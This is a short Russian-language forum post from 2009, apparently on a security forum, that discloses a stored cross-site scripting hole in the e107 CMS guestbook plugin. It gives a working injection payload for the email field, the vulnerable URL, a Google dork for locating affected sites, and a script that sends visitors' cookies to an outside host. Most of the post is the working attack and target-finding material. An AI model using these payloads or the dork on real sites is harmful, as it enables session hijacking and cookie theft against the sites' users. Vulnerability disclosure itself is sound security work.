08.05.2009, 18:55
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
Уязвимость существует из-за недостаточной обработки входных данных параметра " email" в POST запросе сценария guestbook.php.
Уязвимое поле " E-mail". Сформированные Post data заголовок:
Код:
POSTDATA=name=E107 CMS (e107_plugins/guestbook) stored XSS by ettee(itdefence.ru)&email='><script>alert('xss')</script>
Example: http://target/e107_plugins/guestbook/guestbook.php?edit.2. Где " 2" является номером вашего сообщения.
Google dork: inurl:/e107_plugins/guestbook/guestbook.php
Cookie: '><script>img = new Image(); img.src = "http://someshit.net/image/s.gif?"+document.cookie;</script> |
|
|